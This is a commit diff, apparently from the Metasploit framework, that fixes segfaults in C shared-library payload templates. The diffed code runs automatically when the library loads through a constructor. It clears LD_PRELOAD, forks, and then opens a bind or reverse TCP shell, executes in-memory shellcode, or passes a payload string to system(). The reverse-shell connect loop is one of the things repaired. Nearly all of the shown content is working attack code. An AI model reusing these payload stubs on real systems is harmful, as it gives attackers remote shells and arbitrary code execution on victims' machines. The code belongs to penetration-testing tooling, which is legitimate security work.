Resolve a bug in reverse_tcp and segfaults across payloads

MS-2855/keylogger-mettle-extension
HD Moore 2017-12-29 14:18:55 -06:00
parent 68f4d4480e
commit 0b9fbe5a63
64 changed files with 16 additions and 9 deletions

View File

@ -89,7 +89,8 @@ static void _run_payload_(void) __attribute__((constructor));
static void _run_payload_(void)
{
unsetenv("LD_PRELOAD");
if (! fork()) {
if (! fork())
_bind_tcp_shell();
}
exit(0);
}

View File

@ -53,7 +53,9 @@ static void _reverse_tcp_shell(void) {
memset(addr.sin_zero, 0, sizeof(addr.sin_zero));
for (i=0; i<10; i++) {
connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr));
if (! connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr))) {
break;
}
}
for (i=0; i<3; i++) {
@ -75,7 +77,8 @@ static void _run_payload_(void) __attribute__((constructor));
static void _run_payload_(void)
{
unsetenv("LD_PRELOAD");
if (! fork()) {
if (! fork())
_reverse_tcp_shell();
}
exit(0);
}

View File

@ -37,8 +37,8 @@ static void _run_payload_(void)
memcpy(mem, payload, PAYLOAD_SIZE);
fn = (void(*)())mem;
if (! fork()) {
if (! fork())
fn();
kill(getpid(), 9);
}
exit(0);
}

View File

@ -23,7 +23,10 @@ static void _run_payload_(void) __attribute__((constructor));
static void _run_payload_(void)
{
int dummy = 0;
unsetenv("LD_PRELOAD");
if (! fork())
system((const char*)payload);
dummy = system((const char*)payload);
exit(dummy);
}